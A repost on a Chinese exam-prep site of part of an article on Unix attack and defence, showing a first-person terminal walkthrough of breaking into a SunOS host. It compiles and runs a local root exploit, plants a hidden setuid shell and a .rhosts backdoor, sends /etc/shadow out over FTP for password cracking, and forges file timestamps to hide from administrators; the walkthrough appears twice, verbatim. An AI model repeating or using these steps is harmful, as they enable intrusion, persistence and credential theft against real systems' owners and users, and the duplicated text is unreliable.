学历|
高考
中考
考研
自考
成考
外语|
CET6
职称英语
商务英语
公共英语
资格|
公务员
报关员
银行
证券
司法
导游
教师
计算机|
等考
软考
工程|
一建
二建
造价师
监理师
咨询师
安全师
结构师
估价师
造价员
会计|
会计证
中级会计
注会
经济师
税务师
医学|
卫生资格
医师
药师
[更多]
Unix系统的攻击和防范
上面我们建立一个隐藏目录"…",再建立一个隐藏的源代码文件".of.c".接着输入一大串代码,最后按:wq保存并退出vi.我们看看源代码是否生成了:
$ ls -al
total 1330
drw-rw-rw- 7 power user 1999 Jul 4 19:07 .
drw-r--r-- 35 root root 1999 Jun 29 16:52
-rw-rw-r-- 1 power user 2001 Dec 8 13:15 .of.c
Ok! 现在编译链接吧!^_^
$ gcc -o .of .of.c
.of.c:17: malformed floating constant
.of.c:18: malformed floating constant
.of.c:23: nondigits in number and not hexadecimal
……
……
gcc:[$ Error 2 $]
$
???怎么出错了?!估计是有地方敲错了。只好先用gdb调试,再用vi来修改了,真麻烦!(略去调试过程)……终于改完了,编译试一试:
$ gcc -o .of .of.c
$
幸好没出错。Run一下啰……别慌!看看root还在不在:
$ w
13:31pm up 61 day(s), 1 user, ……
User tty login@ idle JCPU PCPU what
power pts/7 13:07pm w
就我一个人了?估计忙了一早上,他们肯定饿坏了,都去吃饭去了吧!^_^
$ ./.of
usage: ./.of lpserver
$ ./of localhost
#
哈哈!成功了!看见提示符变成"#"没有?这就是root的特权标志!
# whoami
root
#
没错了!哈哈!开始我们的"工作"吧:^_^
# rm -fr ./.of.c
# mkdir /usr/man/man1/…
# cp /bin/ksh /usr/man/man1/…/.zsh
# chmod s /usr/man/man1/…/.zsh
首先删掉了源代码文件,然后在/usr/man/man1/下建立一个隐藏目录"…",把ksh这个shell拷过去隐藏起来,并把属性改成-rwsr-sr--.这是个简单的后门,下次我一进来执行它就可以root了,省时省力。^_^
# cd
# cd
# pwd
/export/home
# ls
dennis walter power deal jessica smith render
# cd render
# echo ' ' >./.rhosts
# ls -l
…… .rhosts ……
#
好,又在render的home里建了一个可以远程登陆的后门。下面把这台主机的shadow传回去,以后可以用John多跑一些密码出来:^_^
# cp /etc/shadow /export/home/power/…/.s
# chmod 666 /export/home/power/…/.s
# exit
$ exit
bash$
bash$ ftp 202.202.0.8
Connected to 202.202.0.8…
220 Cool FTP server(Version xxx Tue Dec 8 12:42:10 CDT 2001) ready.
Name(202.202.0.8:FakeName):power
331 Guest login ok,send you complete e-mail address as password.
Password:
230:Welcome,power!
……
……
……
ftp>ls
ftp>cd …
ftp>ls -l
……
.zsh .s
……
ftp>get .s
226 Transfer complete.
540 bytes received in 0.55 seconds (1.8Kbytes/s)
ftp>bye
221 Goodbye.
bash$
顺利地get回来了。再次登陆之:
bash$ telnet 202.202.0.8
SunOS 5.6
login:power
password:
Last login: Mon Dec 8 13:21:15 CDT 2001 from 211.50.33.117
Sun Microsystems Inc. SunOS 5.6
$ /usr/man/man1/…/.zsh
# whoami
root
#
利用刚才作的后门,轻松得到root.别忘了用touch给每个你动过的文件改时间,以免被管理员发现文件被动过!BTW:touch的用法是:touch -t 200112081314 目标文件。然后我们用power的身份telnet一下自己,免得被power下次登陆一下就发现IP有问题:
# telnet localhost
Trying 127.0.0.1…
Connected to localhost.
Escape character is '^]'.
SunOS 5.6
login: power
Password:
Last login: Mon Dec 8 13:21:55 CDT 2001 from 202.202.0.8
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
You have mail.
$ exit
Connection closed by foreign host.
#
$ ls -al
total 1330
drw-rw-rw- 7 power user 1999 Jul 4 19:07 .
drw-r--r-- 35 root root 1999 Jun 29 16:52
-rw-rw-r-- 1 power user 2001 Dec 8 13:15 .of.c
Ok! 现在编译链接吧!^_^
$ gcc -o .of .of.c
.of.c:17: malformed floating constant
.of.c:18: malformed floating constant
.of.c:23: nondigits in number and not hexadecimal
……
……
gcc:[$ Error 2 $]
$
???怎么出错了?!估计是有地方敲错了。只好先用gdb调试,再用vi来修改了,真麻烦!(略去调试过程)……终于改完了,编译试一试:
$ gcc -o .of .of.c
$
幸好没出错。Run一下啰……别慌!看看root还在不在:
$ w
13:31pm up 61 day(s), 1 user, ……
User tty login@ idle JCPU PCPU what
power pts/7 13:07pm w
就我一个人了?估计忙了一早上,他们肯定饿坏了,都去吃饭去了吧!^_^
$ ./.of
usage: ./.of lpserver
$ ./of localhost
#
哈哈!成功了!看见提示符变成"#"没有?这就是root的特权标志!
# whoami
root
#
没错了!哈哈!开始我们的"工作"吧:^_^
# rm -fr ./.of.c
# mkdir /usr/man/man1/…
# cp /bin/ksh /usr/man/man1/…/.zsh
# chmod s /usr/man/man1/…/.zsh
首先删掉了源代码文件,然后在/usr/man/man1/下建立一个隐藏目录"…",把ksh这个shell拷过去隐藏起来,并把属性改成-rwsr-sr--.这是个简单的后门,下次我一进来执行它就可以root了,省时省力。^_^
# cd
# cd
# pwd
/export/home
# ls
dennis walter power deal jessica smith render
# cd render
# echo ' ' >./.rhosts
# ls -l
…… .rhosts ……
#
好,又在render的home里建了一个可以远程登陆的后门。下面把这台主机的shadow传回去,以后可以用John多跑一些密码出来:^_^
# cp /etc/shadow /export/home/power/…/.s
# chmod 666 /export/home/power/…/.s
# exit
$ exit
bash$
bash$ ftp 202.202.0.8
Connected to 202.202.0.8…
220 Cool FTP server(Version xxx Tue Dec 8 12:42:10 CDT 2001) ready.
Name(202.202.0.8:FakeName):power
331 Guest login ok,send you complete e-mail address as password.
Password:
230:Welcome,power!
……
……
……
ftp>ls
ftp>cd …
ftp>ls -l
……
.zsh .s
……
ftp>get .s
226 Transfer complete.
540 bytes received in 0.55 seconds (1.8Kbytes/s)
ftp>bye
221 Goodbye.
bash$
顺利地get回来了。再次登陆之:
bash$ telnet 202.202.0.8
SunOS 5.6
login:power
password:
Last login: Mon Dec 8 13:21:15 CDT 2001 from 211.50.33.117
Sun Microsystems Inc. SunOS 5.6
$ /usr/man/man1/…/.zsh
# whoami
root
#
利用刚才作的后门,轻松得到root.别忘了用touch给每个你动过的文件改时间,以免被管理员发现文件被动过!BTW:touch的用法是:touch -t 200112081314 目标文件。然后我们用power的身份telnet一下自己,免得被power下次登陆一下就发现IP有问题:
# telnet localhost
Trying 127.0.0.1…
Connected to localhost.
Escape character is '^]'.
SunOS 5.6
login: power
Password:
Last login: Mon Dec 8 13:21:55 CDT 2001 from 202.202.0.8
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
You have mail.
$ exit
Connection closed by foreign host.
#
考试大温馨提示:本内容来源于网络,仅代表作者个人观点,与本站立场无关,仅供您学习交流使用。其中可能有部分文章经过多次转载而造成文章内容缺失、错误或文章作者不详等问题,请您谅解。如有侵犯您的权利,请联系我们,本站会立即予以处理。
编辑特别推荐:
linuxln命令详解
nginx关于服务静态文件的配置
使用expect实现ssh自动交互
视频学习
我考网版权与免责声明
① 凡本网注明稿件来源为"原创"的所有文字、图片和音视频稿件,版权均属本网所有。任何媒体、网站或个人转载、链接转贴或以其他方式复制发表时必须注明"稿件来源:我考网",违者本网将依法追究责任;
② 本网部分稿件来源于网络,任何单位或个人认为我考网发布的内容可能涉嫌侵犯其合法权益,应该及时向我考网书面反馈,并提供身份证明、权属证明及详细侵权情况证明,我考网在收到上述法律文件后,将会尽快移除被控侵权内容。
